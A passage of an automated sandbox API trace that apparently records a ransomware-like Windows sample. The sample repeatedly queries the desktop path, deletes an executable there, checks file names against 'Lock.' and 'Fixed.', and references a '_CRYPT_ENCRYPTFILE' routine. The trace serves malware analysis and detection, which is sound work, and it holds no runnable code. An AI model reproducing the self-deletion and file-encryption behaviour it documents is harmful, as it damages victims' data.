lpMem=0x2e79338 | out: hHeap=0x970000) returned 1 [0200.316] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0200.316] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0200.316] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53920 | out: hHeap=0x970000) returned 1 [0200.316] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54210 | out: hHeap=0x970000) returned 1 [0200.316] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0200.316] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541e8 | out: hHeap=0x970000) returned 1 [0200.316] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0200.316] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504b8 | out: hHeap=0x970000) returned 1 [0200.316] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0200.316] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54260 | out: hHeap=0x970000) returned 1 [0200.316] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505a8 | out: hHeap=0x970000) returned 1 [0200.316] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503f8 | out: hHeap=0x970000) returned 1 [0200.316] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0200.316] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544e0 | out: hHeap=0x970000) returned 1 [0200.316] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53788 | out: hHeap=0x970000) returned 1 [0200.316] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0200.316] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0200.316] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0200.316] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0200.316] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e538c0 | out: hHeap=0x970000) returned 1 [0200.316] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e58910 | out: hHeap=0x970000) returned 1 [0200.316] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0200.316] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53848 | out: hHeap=0x970000) returned 1 [0200.316] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53728 | out: hHeap=0x970000) returned 1 [0200.316] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e563a8 | out: hHeap=0x970000) returned 1 [0200.316] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0200.316] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53818 | out: hHeap=0x970000) returned 1 [0200.316] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53890 | out: hHeap=0x970000) returned 1 [0200.317] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53770 | out: hHeap=0x970000) returned 1 [0200.317] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53938 | out: hHeap=0x970000) returned 1 [0200.317] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53908 | out: hHeap=0x970000) returned 1 [0200.317] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e539b0 | out: hHeap=0x970000) returned 1 [0200.317] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0200.317] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53728 [0200.317] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538c0 [0200.317] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0200.317] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf560 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0200.318] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538f0 [0200.318] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fc70 [0200.318] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cd8 [0200.318] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0200.318] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a68 [0200.318] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53788 [0200.318] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e58910 [0200.318] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fc70 | out: hHeap=0x970000) returned 1 [0200.318] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53788 | out: hHeap=0x970000) returned 1 [0200.318] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0200.318] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0200.318] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53818 [0200.318] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53818 | out: hHeap=0x970000) returned 1 [0200.318] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a68 | out: hHeap=0x970000) returned 1 [0200.318] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0200.318] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0200.318] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x5a) returned 0x2e563a8 [0200.318] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop/O4GkFtfMO8YRUkhr.exe", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\O4GkFtfMO8YRUkhr.exe", lpFilePart=0x8cedf4*="O4GkFtfMO8YRUkhr.exe") returned 0x2c [0200.318] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e563a8 | out: hHeap=0x970000) returned 1 [0200.318] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\O4GkFtfMO8YRUkhr.exe" (normalized: "c:\\users\\fd1hvy\\desktop\\o4gkftfmo8yrukhr.exe")) returned 0x20 [0200.319] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\O4GkFtfMO8YRUkhr.exe", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa3827380, ftCreationTime.dwHighDateTime=0x1d67c7d, ftLastAccessTime.dwLowDateTime=0xa3827380, ftLastAccessTime.dwHighDateTime=0x1d67c7d, ftLastWriteTime.dwLowDateTime=0x84361700, ftLastWriteTime.dwHighDateTime=0x1d67c7a, nFileSizeHigh=0x0, nFileSizeLow=0x44b640, dwReserved0=0xfffffffc, dwReserved1=0x8cf25c, cFileName="O4GkFtfMO8YRUkhr.exe", cAlternateFileName="O4GKFT~1.EXE")) returned 0xa86f50 [0200.320] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\O4GkFtfMO8YRUkhr.exe" (normalized: "c:\\users\\fd1hvy\\desktop\\o4gkftfmo8yrukhr.exe")) returned 1 [0200.329] FindNextFileW (in: hFindFile=0xa86f50, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa3827380, ftCreationTime.dwHighDateTime=0x1d67c7d, ftLastAccessTime.dwLowDateTime=0xa3827380, ftLastAccessTime.dwHighDateTime=0x1d67c7d, ftLastWriteTime.dwLowDateTime=0x84361700, ftLastWriteTime.dwHighDateTime=0x1d67c7a, nFileSizeHigh=0x0, nFileSizeLow=0x44b640, dwReserved0=0xfffffffc, dwReserved1=0x8cf25c, cFileName="O4GkFtfMO8YRUkhr.exe", cAlternateFileName="O4GKFT~1.EXE")) returned 0 [0200.329] FindClose (in: hFindFile=0xa86f50 | out: hFindFile=0xa86f50) returned 1 [0200.330] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e58910 | out: hHeap=0x970000) returned 1 [0200.330] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0200.330] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e538f0 | out: hHeap=0x970000) returned 1 [0200.330] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e538c0 | out: hHeap=0x970000) returned 1 [0200.330] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53728 | out: hHeap=0x970000) returned 1 [0200.330] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0200.330] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53728 [0200.330] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53818 [0200.330] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0200.330] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf560 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0200.330] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e539b0 [0200.330] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fc70 [0200.330] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c68 [0200.330] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0200.330] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ac8 [0200.330] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53770 [0200.330] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e58910 [0200.330] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fc70 | out: hHeap=0x970000) returned 1 [0200.330] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53770 | out: hHeap=0x970000) returned 1 [0200.330] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0200.330] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0200.330] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538c0 [0200.330] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e538c0 | out: hHeap=0x970000) returned 1 [0200.330] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0200.330] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0200.331] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0200.331] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53770 [0200.331] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d08 [0200.331] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0200.331] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x5a) returned 0x2e563a8 [0200.331] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop/O4GkFtfMO8YRUkhr.exe", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\O4GkFtfMO8YRUkhr.exe", lpFilePart=0x8cf650*="O4GkFtfMO8YRUkhr.exe") returned 0x2c [0200.331] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e563a8 | out: hHeap=0x970000) returned 1 [0200.331] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\O4GkFtfMO8YRUkhr.exe" (normalized: "c:\\users\\fd1hvy\\desktop\\o4gkftfmo8yrukhr.exe")) returned 0xffffffff [0200.331] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e58910 | out: hHeap=0x970000) returned 1 [0200.331] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0200.331] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e539b0 | out: hHeap=0x970000) returned 1 [0200.331] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53818 | out: hHeap=0x970000) returned 1 [0200.331] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53770 | out: hHeap=0x970000) returned 1 [0200.331] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53728 | out: hHeap=0x970000) returned 1 [0200.331] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0200.331] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77588 | out: hHeap=0x970000) returned 1 [0200.331] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0200.331] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0200.331] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b38 [0200.331] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ba8 [0200.331] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53788 [0200.331] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53770 [0200.331] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0200.331] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b28 [0200.331] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0200.331] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53818 [0200.331] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0200.331] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53848 [0200.331] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0200.331] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53728 [0200.332] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0200.332] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="P52g8.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0200.332] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="52g8.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0200.332] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="2g8.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0200.332] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="g8.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0200.332] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="8.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0200.332] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53818 | out: hHeap=0x970000) returned 1 [0200.332] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53770 | out: hHeap=0x970000) returned 1 [0200.332] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53728 | out: hHeap=0x970000) returned 1 [0200.332] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53848 | out: hHeap=0x970000) returned 1 [0200.332] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53788 | out: hHeap=0x970000) returned 1 [0200.332] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0200.332] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b38 | out: hHeap=0x970000) returned 1 [0200.332] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77ac8 [0200.332] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0200.332] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0200.332] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538d8 [0200.332] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53818 [0200.332] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0200.332] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0200.333] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0200.333] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53860 [0200.333] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0200.333] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53788 [0200.333] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0200.333] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538c0 [0200.333] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0200.333] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53728 [0200.333] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b88 [0200.333] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e539b0 [0200.333] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0200.333] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53848 [0200.333] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c78 [0200.333] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e698c8 [0200.333] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b38 [0200.333] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="P52g8.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0200.333] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="52g8.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0200.333] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="2g8.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0200.333] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="g8.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0200.333] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53848 | out: hHeap=0x970000) returned 1 [0200.333] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79338 [0200.333] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53890 [0200.333] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79338 | out: hHeap=0x970000) returned 1 [0200.333] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0200.333] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53860 | out: hHeap=0x970000) returned 1 [0200.333] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53818 | out: hHeap=0x970000) returned 1 [0200.334] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e538c0 | out: hHeap=0x970000) returned 1 [0200.334] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53788 | out: hHeap=0x970000) returned 1 [0200.334] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e539b0 | out: hHeap=0x970000) returned 1 [0200.334] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53728 | out: hHeap=0x970000) returned 1 [0200.334] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e538d8 | out: hHeap=0x970000) returned 1 [0200.334] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0200.334] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80178 | out: hHeap=0x970000) returned 1 [0200.334] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0200.334] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53830 | out: hHeap=0x970000) returned 1 [0200.334] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53878 [0200.334] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53890 | out: hHeap=0x970000) returned 1 [0200.334] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0200.334] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fb90 [0200.334] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b88 [0200.334] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0200.334] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fb90 | out: hHeap=0x970000) returned 1 [0200.334] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0200.334] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538c0 [0200.334] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54cc8 [0200.334] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538d8 [0200.334] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53770 [0200.334] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0200.334] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf4d0 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0200.334] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53818 [0200.334] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fc70 [0200.334] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c78 [0200.335] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0200.335] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69bc8 [0200.335] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53830 [0200.335] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e58910 [0200.335] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fc70 | out: hHeap=0x970000) returned 1 [0200.335] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53830 | out: hHeap=0x970000) returned 1 [0200.335] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bd8 [0200.335] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0200.335] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53890 [0200.335] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53890 | out: hHeap=0x970000) returned 1 [0200.335] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69bc8 | out: hHeap=0x970000) returned 1 [0200.335] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0200.335] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0200.335] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c48 [0200.335] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53788 [0200.335] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0200.335] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf4d0 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0200.335] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538f0 [0200.335] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fe30 [0200.335] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c28 [0200.335] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0200.335] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a28 [0200.335] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53728 [0200.335] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x80) returned 0x2e563a8 [0200.335] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fe30 | out: hHeap=0x970000) returned 1 [0200.335] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53728 | out: hHeap=0x970000) returned 1 [0200.336] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e539b0 [0200.336] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e539b0 | out: hHeap=0x970000) returned 1 [0200.336] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a28 | out: hHeap=0x970000) returned 1 [0200.336] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0200.336] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0200.336] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c08 [0200.336] RtlAllocateHeap 